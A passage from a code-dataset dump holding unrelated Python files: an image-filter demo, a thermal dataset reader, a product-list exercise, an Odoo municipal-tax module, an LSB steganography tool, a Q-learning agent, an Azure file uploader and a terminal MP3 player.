cv2.filter2D(img1, cv2.CV_32F, sobelY)\r\nmag = cv2.magnitude(gx, gy)\r\nimg1 = cv2.normalize(mag, 0, 255, cv2.NORM_MINMAX)\r\n\r\n\r\nLaplacianX = np.array([[0, 1, 0],\r\n [1, -4, 1],\r\n [0, 1, 0]], dtype = np.float32)\r\ngx = cv2.filter2D(img2, cv2.CV_32F, LaplacianX)\r\nLaplacianY = np.array([[0, 1, 0],\r\n [1, -4, 1],\r\n [0, 1, 0]], dtype = np.float32)\r\ngy = cv2.filter2D(img2, cv2.CV_32F, LaplacianY)\r\nmag = cv2.magnitude(gx, gy)\r\nimg2 = cv2.normalize(mag, 0, 255, cv2.NORM_MINMAX)\r\n\r\n\r\nSmoothing = np.ones((3, 3), np.float32)/9 # use a 5x5 filter so the blur effect is clearly visible\r\nimg3 = cv2.filter2D(img3, -1, Smoothing)\r\n\r\nweighted = np.array([[1, 2, 1],\r\n [2, 4, 2],\r\n [1, 2, 1]], dtype = 
np.float32)\r\nSmoothing = weighted/16 \r\nimg4 = cv2.filter2D(img4, -1, Smoothing)\r\n\r\nfig, ax = plt.subplots(2, 2, figsize=(10,10), sharey=True)\r\nfig.canvas.set_window_title('Sample Pictures')\r\n\r\nax[0][0].axis('off')\r\nax[0][0].imshow(img1, aspect = 'auto')\r\n\r\nax[0][1].axis('off')\r\nax[0][1].imshow(img2, aspect = 'auto')\r\n\r\nax[1][0].axis(\"off\")\r\nax[1][0].imshow(img3, aspect = \"auto\")\r\n\r\nax[1][1].axis(\"off\")\r\nax[1][1].imshow(img4, aspect = 'auto')\r\n\r\nplt.subplots_adjust(left=0, bottom=0, right=1, top=1,\r\n wspace=0.05, hspace=0.05)\r\n#plt.savefig(\"./data/0206.png\", bbox_inches='tight')\r\nplt.show()\r\n","sub_path":"OpenCV-filter2D/에지검출,노이즈제거비교.py","file_name":"에지검출,노이즈제거비교.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"86053102","text":"# MIT License\n#\n# Copyright (c) 2020 HENSOLDT\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom pathlib import Path\n\nimage_type_ldr = \"jpeg\"\nimage_type_hdr = \"tiff\"\nfolder_ldr = \"thermal_8_bit\"\nfolder_hdr = \"thermal_16_bit\"\nsize_train_set = 8862\nsize_val_set = 1366\nsize_video_set = 4224\n\n\ndef get_subset(folder):\n images_ldr = [x for x in (folder / folder_ldr).iterdir() if x.is_file() and (x.name[-4:] == image_type_ldr)]\n images_hdr = [x for x in (folder / folder_hdr).iterdir() if x.is_file() and (x.name[-4:] == image_type_hdr)]\n\n if len(images_ldr) == 0 or len(images_hdr) == 0:\n raise IndexError(\"'\" + folder.name + \"' is an empty directory\")\n\n images_ldr.sort()\n images_hdr.sort()\n return {'ldr': images_ldr, 'hdr': images_hdr}\n\n\ndef flir_thermal_dataset(flir_thermal_dataset_root_path):\n # check for correct FLIR data structure\n flir_thermal_dataset_path = Path(flir_thermal_dataset_root_path)\n for folder in flir_thermal_dataset_path.iterdir():\n if folder.name == \"video\":\n if folder.is_dir():\n video = get_subset(folder)\n\n if folder.name == \"val\":\n if folder.is_dir():\n val = get_subset(folder)\n\n if folder.name == \"train\":\n if folder.is_dir():\n train = get_subset(folder)\n\n return {'video': video, 'val': val, 'train': train}\n\n\ndef main():\n print(\"test is running\")\n data = flir_thermal_dataset(\"/Data/FLIR_ADAS_IR_ObjDet_Dataset/FLIR_ADAS_1_3\")\n assert(len(data['train']['ldr']) == size_train_set and len(data['train']['hdr']) == size_train_set)\n assert(len(data['val']['ldr']) == size_val_set and len(data['val']['hdr']) == size_val_set)\n 
assert(len(data['video']['ldr']) == size_video_set and len(data['video']['hdr']) == size_video_set)\n print(\"test succeeded\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"measures/FLIR_Thermal_Dataset_reader/FLIR_Thermal_Dataset_reader.py","file_name":"FLIR_Thermal_Dataset_reader.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"320380318","text":"# ! usr/bin/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@Demands describe:\nCreate a list whose elements store the information of 2 products; each product\nuses the dictionary type, and the product info includes: product number,\nproduct name and product price. Then complete the operations on product 2,\nas well as the modification of product 1's price.\n@Creator :LeiZhang\n@Create datetime:2018/08/17 16:18\n@Modif datetime:2018/08/18 12:25\n@License:MIT\n\"\"\"\n\n\nimport random\n\n\n'''--------------storage container pre-definition area------------------------------------------------------'''\n# define the product list prod_list\nprod_list = []\n# define the list del_prod that stores the product numbers to delete\ndel_prod = [\"商品2\", \"商品90\"]\n# define the list mod_prod that stores the product numbers to update\nmod_prod = [\"商品1\", \"商品80\"]\n\n# define the dictionaries prod_attr that store the product attributes\nprod_1 = {\"prod_no\": \"商品1\", \"prod_name\": \"中软小甲\", \"prod_price\": 7400}\nprod_2 = {\"prod_no\": \"商品4\", \"prod_name\": \"中软小乙\", \"prod_price\": 89955200}\nprod_3 = {\"prod_no\": \"商品3\", \"prod_name\": \"中软小丙\", \"prod_price\": 458400}\nprod_4 = {\"prod_no\": \"商品2\", \"prod_name\": \"中软小丁\", \"prod_price\": 5255800}\n\n'''----------------product information processing----------------------------------------------------------'''\n# load the product info into the prod_list list\nprod_list = [prod_1, prod_2, prod_3, prod_4]\n\n# count the products in the product list and store the count in prod_num\nprod_num = len(prod_list)\n\n# shuffle the list's original order (like shuffling cards)\nrandom.shuffle(prod_list)\n\n\n'''---------------perform the update (delete/update) operations on the product list--------------------------------'''\n# iterate over a copy of prod_list so products can be removed safely while looping\nfor prod in list(prod_list):\n # if the product number is in the to-delete list, delete the product\n if prod[\"prod_no\"] in del_prod:\n print(\"正在删除编号为{}的商品\".format(prod[\"prod_no\"]))\n prod_list.remove(prod)\n\n # if the product number is in the update list mod_prod, change its price\n elif prod[\"prod_no\"] in mod_prod:\n prod[\"prod_price\"] = 900\n\n else:\n print(\"没有检索到需要更新的商品编号,不执行任何操作\")\n\n\n'''-------------check the products left in the list after the delete/update operations------------------------------------'''\nprint(\"执行完商品信息更新操作后,商品列表如下:\")\nfor prod in prod_list:\n print(prod)","sub_path":"homework/day04/hw02.py","file_name":"hw02.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"201691922","text":"# -*- coding: utf-8 -*-\n\nimport logging\nfrom odoo import api, fields, models, _ \nfrom odoo.exceptions import UserError, ValidationError\n\n_logger = logging.getLogger('__name__')\n\n\n\n\nclass AccountMoveLine(models.Model):\n _inherit = \"account.move.line\"\n\n\n\n concept_id = fields.Many2one('muni.wh.concept', string='Municipal Tax')\n\n\n def _check_balanced(self):\n ''' Assert the move is fully balanced debit = credit.\n An error is raised if it's not the case.\n '''\n moves = self.filtered(lambda move: move.line_ids)\n if not moves:\n return\n\n # /!\\ As this method is called in create / write, we can't make the assumption the computed stored fields\n # are already done. Then, this query MUST NOT depend on computed stored fields (e.g. 
balance).\n # It happens as the ORM makes the create with the 'no_recompute' statement.\n self.env['account.move.line'].flush(['debit', 'credit', 'move_id'])\n self.env['account.move'].flush(['journal_id'])\n self._cr.execute('''\n SELECT line.move_id, ROUND(SUM(debit - credit), currency.decimal_places)\n FROM account_move_line line\n JOIN account_move move ON move.id = line.move_id\n JOIN account_journal journal ON journal.id = move.journal_id\n JOIN res_company company ON company.id = journal.company_id\n JOIN res_currency currency ON currency.id = company.currency_id\n WHERE line.move_id IN %s\n GROUP BY line.move_id, currency.decimal_places\n HAVING ROUND(SUM(debit - credit), currency.decimal_places) != 0.0;\n ''', [tuple(self.ids)])\n\n query_res = self._cr.fetchall()\n if query_res:\n ids = [res[0] for res in query_res]\n sums = [res[1] for res in query_res]\n\n\n\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n\n\n wh_muni_id = fields.Many2one('municipality.tax', string='Withholding municipal tax', readonly=True, copy=False)\n\n def conv_div_nac(self,valor):\n self.currency_id.id\n fecha_contable_doc=self.date\n monto_factura=self.amount_total\n valor_aux=0\n #raise UserError(_('moneda compañia: %s')%self.company_id.currency_id.id)\n if self.currency_id.id!=self.company_id.currency_id.id:\n tasa= self.env['res.currency.rate'].search([('currency_id','=',self.currency_id.id),('name','<=',self.date)],order=\"name asc\")\n for det_tasa in tasa:\n if fecha_contable_doc>=det_tasa.name:\n valor_aux=det_tasa.rate\n rate=round(1/valor_aux,2) # LANTA\n #rate=round(valor_aux,2) # ODOO SH\n resultado=valor*rate\n else:\n resultado=valor\n return resultado\n\n def _create_muni_wh_voucher(self):\n\n vals = {}\n values = {}\n muni_wh = self.env['municipality.tax']\n muni_wh_line = self.env['account.move.line']\n _logger.info(\"\"\"\\n\\n\\n Hola se esta ejecutando el action_post de la retencion municipal\\n\\n\\n\"\"\")\n # _logger.info(\"\"\"\\n\\n\\n\\n invoice %s \\n\\n\\n\"\"\", invoice)\n # create the municipality.tax.line model record\n res = []\n for item in self.invoice_line_ids:\n # darrell's code\n base_impuesto=item.price_subtotal\n impuesto_mun=item.concept_id.aliquot\n # end of darrell's code\n #raise UserError(_('impuesto_mun= %s')%impuesto_mun)\n if item.concept_id.aliquot>0:\n res.append((0,0, {\n 'code': item.concept_id.code,\n 'aliquot': item.concept_id.aliquot,\n 'concept_id': item.concept_id.id,\n #'base_tax': self.amount_untaxed,\n 'base_tax': self.conv_div_nac(base_impuesto), # darrell's fix\n 'invoice_id': self.id,\n 'invoice_date' : self.date,\n 'invoice_number': self.invoice_number,\n 'invoice_ctrl_number': self.invoice_ctrl_number,\n #'type':self.type, # new (darrell)\n }))\n _logger.info(\"\\n\\n\\n res %s \\n\\n\\n\\n\", res)\n # Create the withholding record\n vals = {\n 'partner_id': self.partner_id.id,\n 'rif': self.partner_id.vat,\n 'invoice_id': self.id,\n 'act_code_ids': res,\n 'type':self.type,\n }\n _logger.info(\"\\n\\n\\n vals %s \\n\\n\\n\", vals)\n muni_tax = muni_wh.create(vals)\n _logger.info(\"\\n\\n\\n muni %s\\n\\n\\n\", muni_tax)\n self.write({'wh_muni_id': muni_tax.id})\n #raise UserError(_('cuentas = %s')%self.write({'wh_muni_id': muni_tax.id}))\n\n def actualiza_voucher_wh(self):\n #raise UserError(_('mama = %s')%self)\n cursor_municipality = self.env['municipality.tax'].search([('id','=',self.wh_muni_id.id)])\n for det in cursor_municipality:\n self.env['municipality.tax'].browse(det.id).write({\n 'type': 
self.type,\n 'invoice_number': self.invoice_number,\n })\n\n\n def action_post(self):\n \"\"\"This function creates the municipal retention voucher too.\"\"\"\n invoice = super().action_post()\n # the partner is a municipal withholding agent\n _logger.info(\"\\n\\n\\n\\n action_post de Impuestos municipales \\n\\n\\n\\n\")\n \n if self.partner_id.muni_wh_agent==True or self.company_id.partner_id.muni_wh_agent==True:\n # only if a withholding does not exist yet\n bann=0\n bann=self.verifica_exento_muni()\n if bann>0:\n if not self.wh_muni_id:\n self._create_muni_wh_voucher()\n self.actualiza_voucher_wh()\n self.unifica_alicuota_iguales()\n return invoice\n\n def verifica_exento_muni(self):\n acum=0\n #raise UserError(_('self = %s')%self.id)\n puntero_move_line = self.env['account.move.line'].search([('move_id','=',self.id)])\n for det_puntero in puntero_move_line:\n acum=acum+det_puntero.concept_id.aliquot\n return acum\n\n def unifica_alicuota_iguales(self):\n if self.type=='in_invoice' or self.type=='in_refund' or self.type=='in_receipt':\n type_tax_use='purchase'\n if self.type=='out_invoice' or self.type=='out_refund' or self.type=='out_receipt':\n type_tax_use='sale'\n lista_impuesto = self.env['muni.wh.concept'].search([])\n #raise UserError(_('lista_impuesto = %s')%lista_impuesto)\n for det_tax in lista_impuesto:\n #raise UserError(_('det_tax.id = %s')%det_tax.id)\n lista_mov_line = self.env['municipality.tax.line'].search([('invoice_id','=',self.id),('concept_id','=',det_tax.id)])\n #raise UserError(_('lista_mov_line = %s')%lista_mov_line)\n #amount_untaxed=0\n base_tax=0\n #amount_vat_ret=0\n wh_amount=0\n #retention_amount=0\n if lista_mov_line:\n for det_mov_line in lista_mov_line: \n base_tax=base_tax+det_mov_line.base_tax\n wh_amount=wh_amount+det_mov_line.wh_amount\n #retention_amount=retention_amount+det_mov_line.retention_amount\n\n code=det_mov_line.code\n #raise UserError(_('nombre1 = %s')%nombre)\n aliquot=det_mov_line.aliquot\n invoice_id=det_mov_line.invoice_id.id\n invoice_number=det_mov_line.invoice_number\n municipality_tax_id=det_mov_line.municipality_tax_id.id\n invoice_ctrl_number=det_mov_line.invoice_ctrl_number\n tipe=det_mov_line.type\n concept_id=det_mov_line.concept_id.id\n #raise UserError(_('lista_mov_line = %s')%lista_mov_line)\n lista_mov_line.unlink()\n move_obj = self.env['municipality.tax.line']\n valor={\n 'code':code,\n 'aliquot':aliquot,\n 'invoice_id':invoice_id,\n 'invoice_number':invoice_number,\n 'municipality_tax_id':municipality_tax_id,\n 'invoice_ctrl_number':invoice_ctrl_number,\n 'base_tax':base_tax,\n 'wh_amount':wh_amount,\n 'type':tipe,\n 'concept_id':concept_id,\n }\n move_obj.create(valor)\n\n\n\n\n\n","sub_path":"loca_13/municipality_tax/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":8515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"168534979","text":"import cv2\nimport numpy as np\n\nfrom tkinter import *\nfrom tkinter import filedialog\n\nindex=0 #global\nmessage=[]\n\nfilename=\"\"\n\nwindow=Tk()\nwindow.title(\"Linear Steganography\")\ncanvas=Canvas(window,width=500,height=500)\ncanvas.pack()\n\ndef readMessage():\n msg=str(textbox.get())\n print(\"Message: \"+msg)\n \n for letter in msg:\n ascii_code=ord(letter)#convert letter to ASCII (a=97)\n bin_ascii=bin(ascii_code)#convert ASCII (integer) to binary 97=0b1100001\n bin_ascii=bin_ascii[2:] #Splitting 0b1100001 to 1100001 # len:7\n print(\"Ascii code:\"+bin_ascii) \n \n for i in bin_ascii:#iterate over the 
ascii bits in binary form\n message.append(i) #append the relevant bit to message\n \n \n window.destroy() #destroy the window\n \n #call main program \n program()\n\n\ndef binary_change(img_data):\n #change string to list; that's the only way you can change the least significant bit\n\n global index\n #sum=bin(int(img_data,2) + int(message[index],2))\n \n piksel_frame=list(img_data) #convert the pixel value to a list (array)\n size=len(img_data) #get the length\n \"\"\"\n print(\"binary form of pixel: {} lsb:{} \".format(data,piksel_frame[size-1]))\n \"\"\"\n piksel_frame[size-1]=message[index]#replace the LSB with the relevant message bit\n index=index+1 #increment the index for the next message bit \n\n img_data=\"\".join(piksel_frame)#convert the modified pixel frame back to a string\n return img_data #return the pixel\n\ndef slctimg():\n global filename\n filename=filedialog.askopenfilename(initialdir=\"/\",title=\"Select A file\",filetype=((\"jpeg\",\"*jpg\"),(\"All Files\",\"*.*\")))\n lbl2=Label(window,text=filename,font=(\"arial\",20)).place(x=100,y=50)\n print(filename)\n\n\n#1kb message\n\n\ndef program():\n\n path = r''+str(filename) \n \n img=cv2.imread(path)\n\n #convert to grayscale img\n img=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n #for RGB\n #height,width,channels=img.shape\n\n height,width=img.shape\n\n\n cv2.imshow('image',img)\n print(\"height:{} width:{}, channels:1\".format(height,width))\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n #Read Message for Message.txt \n print(\"Message:\"+str(message))\n\n c=0\n for i in range(0,width):#width\n for y in range(0,height):#height\n\n if(c
the best action to take in a state. \n \n \"\"\"\n\n possibleActions = self.getLegalActions(state)\n\n #If there are no legal actions, return None\n if len(possibleActions) == 0:\n \treturn None\n \n best_action = max(possibleActions, key=lambda action: self.getQValue(state, action))\n\n\n return best_action\n\n def getAction(self, state):\n \"\"\"\n Compute the action to take in the current state, including exploration. \n \n With probability self.epsilon, we should take a random action.\n otherwise - the best policy action (self.getPolicy).\n\n HINT: You might want to use util.flipCoin(prob)\n HINT: To pick randomly from a list, use random.choice(list)\n\n \"\"\"\n \n # Pick Action\n possibleActions = self.getLegalActions(state)\n action = None\n \n #If there are no legal actions, return None\n if len(possibleActions) == 0:\n \treturn None\n\n #agent parameters:\n epsilon = self.epsilon\n\n if np.random.random() < epsilon:\n action = random.choice(possibleActions)\n else:\n action = self.getPolicy(state)\n \n\n return action\n\n def update(self, state, action, nextState, reward):\n \"\"\"\n You should do your Q-Value update here\n\n NOTE: You should never call this function,\n it will be called on your behalf\n\n\n \"\"\"\n #agent parameters\n gamma = self.discount\n learning_rate = self.alpha\n\n \n reference_qvalue = reward + gamma * self.getValue(nextState)\n updated_qvalue = learning_rate * reference_qvalue + (1 - learning_rate) * self.getQValue(state, action)\n\n self.setQValue(state,action,updated_qvalue)\n\n\n#---------------------#end of your code#---------------------#\n\n\n\nclass PacmanQAgent(QLearningAgent):\n \"Exactly the same as QLearningAgent, but with different default parameters\"\n\n def __init__(self, epsilon=0.05,gamma=0.7,alpha=0.3, numTraining=0, **args):\n \"\"\"\n These default parameters can be changed from the pacman.py command line.\n For example, to change the exploration rate, try:\n python pacman.py -p PacmanQLearningAgent -a epsilon=0.1\n\n alpha - learning rate\n epsilon - exploration rate\n gamma - discount factor\n numTraining - number of training episodes, i.e. no learning after these many episodes\n \"\"\"\n args['epsilon'] = epsilon\n args['gamma'] = gamma\n args['alpha'] = alpha\n args['numTraining'] = numTraining\n self.index = 0 # This is always Pacman\n QLearningAgent.__init__(self, **args)\n\n def getAction(self, state):\n \"\"\"\n Simply calls the getAction method of QLearningAgent and then\n informs parent of action for Pacman. 
Do not change or remove this\n method.\n \"\"\"\n action = QLearningAgent.getAction(self,state)\n self.doAction(state,action)\n return action\n\n\n\nclass ApproximateQAgent(PacmanQAgent):\n pass\n","sub_path":"RL/hw03/qlearningAgents_part2_old.py","file_name":"qlearningAgents_part2_old.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"347016128","text":"import os\r\nimport json\r\nfrom azure.storage.fileshare import ShareDirectoryClient\r\nfrom azure.storage.fileshare import ShareFileClient\r\n\r\ndef read_json_repo(filepath):\r\n f = open (filepath, \"r\")\r\n\r\n # Reading from file\r\n data = json.loads(f.read())\r\n \r\n c_str = data[\"c_str\"]\r\n s_name = data[\"s_name\"]\r\n\r\n return c_str, s_name\r\n # filepathrepo = \"configuration/repo_config.json\"\r\n # c_str, s_name = read_json_repo(filepathrepo)\r\n\r\ndef helper_copy_dir(source_dir, desti_dir, c_str, s_name, useless_ele, space = \"\"):\r\n for ele in os.listdir(source_dir):\r\n if ele in useless_ele:\r\n continue\r\n\r\n print(space, int(os.path.isdir(source_dir + \"/\" + ele)), ele)\r\n\r\n if os.path.isdir(source_dir + \"/\" + ele):\r\n dir_client = ShareDirectoryClient.from_connection_string(conn_str=c_str, share_name=s_name, directory_path=desti_dir + \"/\" + ele)\r\n dir_client.create_directory()\r\n\r\n helper_copy_dir(source_dir + \"/\" + ele, desti_dir + \"/\" + ele, c_str, s_name, useless_ele, space = space + \" \")\r\n else:\r\n file_client = ShareFileClient.from_connection_string(conn_str=c_str, share_name=s_name, file_path=desti_dir + \"/\" + ele)\r\n\r\n with open(source_dir + \"/\" + ele, \"rb\") as source_file:\r\n file_client.upload_file(source_file)\r\n\r\ndef upload_source(source_name, source_dir, desti_dir, c_str, s_name, useless_ele = {\"__pycache__\"}, space = \"\"):\r\n\r\n if os.path.isdir(source_dir + \"/\" + source_name):\r\n dir_client = ShareDirectoryClient.from_connection_string(conn_str=c_str, share_name=s_name, directory_path=desti_dir + \"/\" + source_name)\r\n dir_client.create_directory()\r\n\r\n print(source_dir + \"/\" + source_name)\r\n helper_copy_dir(source_dir + \"/\" + source_name, desti_dir + \"/\" + source_name, c_str, s_name, useless_ele, space = space)\r\n \r\n else:\r\n file_client = ShareFileClient.from_connection_string(conn_str=c_str, share_name=s_name, file_path=desti_dir + \"/\" + source_name)\r\n\r\n with open(source_dir + \"/\" + source_name, \"rb\") as source_file:\r\n file_client.upload_file(source_file)\r\n\r\n print(\"Upload Complete\")\r\n\r\n\r\n# filepathrepo = \"configuration/repo_config.json\"\r\n# c_str, s_name = read_json_repo(filepathrepo)\r\n\r\n# source_name = \"app_copy\"\r\n# source_dir = \"repository/apps_info\"\r\n# desti_dir = \"repository/apps_info\"\r\n\r\n# upload_source(source_name, source_dir, desti_dir, c_str, s_name, useless_ele = {\"__pycache__\"}, space=\" \")\r\n","sub_path":"azurerepository/uploadapp/upload_to_azure.py","file_name":"upload_to_azure.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"194223676","text":"#!/usr/bin/env python3\n#----------------------------------------------------------------------#\n# Console MP3 Player #\n# #\n# Author: Drew Johnson #\n# Email: drew.m.johnson2@gmail.com #\n# Date: October 24th 2017 #\n# #\n# This is a mp3 player that can be run directly from your terminal! 
#\n# With just a few tweaks in the source code you can have this bad boy #\n# working in no time! #\n# #\n#----------------------------------------------------------------------#\n\nimport curses, glob, os, subprocess\n\npath = '/Users/drewjohnson/desktop/songs/*' # Path for importing file names of songs\nprefix = '/Users/drewjohnson/desktop/songs/' # Prefix to be removed from filenames before displaying on screen\nfile=glob.glob(path) # Method used for grabbing file names from folder containing MP3's\nfile2 = file # List of raw paths to file. Used for playing songs\nfiles = [] # List of edited file names for displaying to user\nmessage = \"Arrow keys: select song/change page - Space Bar: start/stop - esc: exit\" # Printed at bottom of screen\nspace = \" \"\nisRunning = False \nmultiList = []\nplayList = [] \n\n#---------------------------------------------------------------#\n# Function for starting audio player subprocess #\n# Parameters: #\n# row - The current location of cursor. #\n# #\n# proecessList - list of current processes. #\n# #\n# page - current location in multi-dimensional list #\n#---------------------------------------------------------------#\ndef playSong(row, processList, page):\n \n if processList[0] == '': # Starting first process\n processList[0] = subprocess.Popen([\"afplay\", playList[page][row]])\n \n elif processList[0].poll() == None: # If a process is currently running, kill process, start new one\n processList[0].kill()\n processList[0] = subprocess.Popen([\"afplay\", playList[page][row]])\n \n else: # Otherwise, start a process\n processList[0] = subprocess.Popen([\"afplay\", playList[page][row]])\n\n#---------------------------------------------------------------#\n# Function behaves as name would suggest. #\n# Parameters: #\n# processList - list of current processes. #\n#---------------------------------------------------------------#\ndef stopPlaying(processList):\n \n processList[0].kill()\n\n#---------------------------------------------------------------#\n# This function removes path prefix from file name and then is #\n# stored in a list for printing to the screen. #\n# Parameters: #\n# text - a full path name to be trimmed. #\n# #\n# prefix - string to be trimmed. #\n#---------------------------------------------------------------#\ndef remove_prefix(text, prefix):\n \n if text.startswith(prefix):\n files.append(text[len(prefix):])\n\n#---------------------------------------------------------------#\n# Iterates through raw list of file paths and calls the #\n# function \"remove_prefix\" for string manipulation #\n#---------------------------------------------------------------#\ndef setList():\n \n for x in file:\n remove_prefix(x, prefix)\n\n#---------------------------------------------------------------#\n# This function gets the paths of all songs. It initializes #\n# a list that's used for playing audio files. #\n# Parameters: #\n# file - list of raw file paths #\n# #\n# wheight - height of subwindow #\n# #\n# playList - list that's used for playing audio files. #\n# #\n# page - current location in multi-dimensional list. 
#\n#---------------------------------------------------------------#\ndef getPlaylist(file, wheight, playList, page): \n filePlaceHolder = 0\n while(1):\n \n holdFile = []\n \n for x in range(0, wheight - 2): # Adds items to a hold list\n \n holdFile.append(file[filePlaceHolder]) \n filePlaceHolder += 1\n\n if filePlaceHolder == len(file):\n break\n \n playList.append(holdFile) # Adds hold list to another list\n page += 1\n\n if filePlaceHolder == len(file):\n break\n\n#---------------------------------------------------------------#\n# This function moves the file names of all imported songs #\n# into a multidimensional list. #\n# Parameters: #\n# #\n# files - list of file names with full path stripped off #\n# #\n# whight - height of subwindow #\n# #\n# multiList - multi-dememsional list containing song names by #\n# by page number. #\n# #\n# page - current location in multi-dimensional list. #\n#---------------------------------------------------------------#\n\ndef getList(files, wheight, multiList, page):\n filePlaceHolder = 0\n while(1):\n \n holdFile = [] # Adds items to a hold list\n \n for x in range(0, wheight - 2):\n \n holdFile.append(files[filePlaceHolder])\n filePlaceHolder += 1\n\n if filePlaceHolder == len(file):\n break\n \n multiList.append(holdFile) # Adds hold list to another list\n page += 1\n\n if filePlaceHolder == len(files):\n break\n\n#---------------------------------------------------------------#\n# This function clears the screen for the next page to be #\n# displayed. #\n# Parameters: #\n# #\n# window - The current window object used. #\n# #\n# multiList - multi-dememsional list containing song names by #\n# by page number. #\n# #\n# whight - height of subwindow #\n# #\n# wwidth - width of the subwindow #\n# #\n# row - The current location of the cursor. #\n#---------------------------------------------------------------#\ndef clearLine(window, multiList, wheight, wwidth, row):\n \n window.move(0,0)\n\n for i in range(0, wheight - 1):\n \n for x in range(0, wwidth - 1):\n \n window.addstr(\" \")\n\n row = row + 1\n window.move(row, 0)\n\n row = 0\n window.move(row,0)\n\n#---------------------------------------------------------------#\n# Function reprints selected row with highlighted text #\n# #\n# Parameters: #\n# row - The current location of the cursor. #\n# #\n# window - The current window object used. #\n# #\n# multiList - multi-dememsional list containing song names by #\n# by page number. #\n# #\n# page - current location in multi-dimensional list. #\n#---------------------------------------------------------------#\ndef rowSelection(row, window, multiList, page): \n\n text = multiList[page][row] # Line to reprint\n window.addnstr(text, len(text), curses.color_pair(1)) # Reprint line with highlight\n window.move(row, 0) # Moves cursor back to beginning of line\n\n#---------------------------------------------------------------#\n# Function reprints selected without highlighted text #\n# #\n# Parameters: #\n# row - The current location of the cursor. #\n# #\n# window - The current window object used. #\n# #\n# multiList - multi-dememsional list containing song names by #\n# by page number. #\n# #\n# page - current location in multi-dimensional list. 
#\n#---------------------------------------------------------------#\ndef rowDeselection(row, window, multiList, page):\n\n text = multiList[page][row] # Line to reprint\n window.addnstr(text, len(text)) # Reprint line with highlight\n window.move(row, 0) # Moves cursor back to beginning of line\n\n#---------------------------------------------------------------#\n# Function \"beginConsole\" creates an infinite loop. This loop #\n# is used for reading user input, namely the up/down/space/esc #\n# keys. #\n# #\n# Parameters: #\n# row - The current location of cursor. #\n# #\n# isRunning - Used to determine if a current processes is still #\n# running. #\n# #\n# window - the current window object used. #\n# #\n# whight - height of subwindow #\n# #\n# wwidth - width of the subwindow #\n# #\n# multiList - multi-dememsional list containing song names by #\n# by page number. #\n# #\n# page - current location in multi-dimensional list. #\n#---------------------------------------------------------------#\ndef beginConsole(row, isRunning, window, wheight, wwidth, multiList, page):\n \n getPlaylist(file, wheight, playList, page)\n \n processList = [''] # Initializing a list to hold active processes\n \n checkRow = row # Used for keeping track of whether song should be\n # stopped or new song should be played.\n\n while (1):\n \n c = window.getch() # Receive user input\n\n if c == curses.KEY_DOWN and row < len(multiList[page]) - 1: # Check to keep user from moving curser past options\n\n rowDeselection(row, window, multiList, page) \n row = row + 1 # New position of curser\n window.move(row, 0) # Move position of curser down\n rowSelection(row, window, multiList, page)\n window.refresh() # Refresh screen\n checkRow = row - 1 # Previous position of cursor\n\n elif c == curses.KEY_UP and row > 0: # Check to keep user from moving curser past options\n\n rowDeselection(row, window, multiList, page)\n row = row - 1\n window.move(row, 0)\n rowSelection(row, window, multiList, page)\n window.refresh()\n checkRow = row + 1\n\n elif c == curses.KEY_RIGHT and page < len(multiList) - 1:\n \n page = page + 1 # New page number\n row = 0\n clearLine(window, multiList, wheight, wwidth, row) # Clears screen\n printOptions(row, window, wheight, wwidth, page) # Prints next page to screen\n window.refresh()\n row = 0\n window.move(row, 0)\n \n elif c == curses.KEY_LEFT and page > 0:\n\n page = page - 1\n row = 0\n clearLine(window, multiList, wheight, wwidth, row)\n printOptions(row, window, wheight, wwidth, page)\n window.refresh()\n row = 0\n window.move(row, 0)\n \n elif c == ord(' '): # Condition for detection of spacebar\n\n if isRunning == True: # If a process is running kill the \n stopPlaying(processList) # process.\n isRunning = False\n\n if checkRow != row: # If curser is on a new line play song\n playSong(row, processList, page) # that is currently selected.\n isRunning = True\n\n else: # If no process is running play song\n playSong(row, processList, page)\n isRunning = True\n \n checkRow = row\n \n elif c == 27: # Check for escape key\n newProc = subprocess.Popen(['killall', 'afplay']) # Kill all processes\n break # Break from loop for termination \n # of program.\n#---------------------------------------------------------------#\n# Function prints options from list to screen for user #\n# selection. #\n# #\n# Parameters: #\n# row - The current location of cursor. #\n# #\n# window - the current window object used #\n# #\n# wheight - height of the subwindow. 
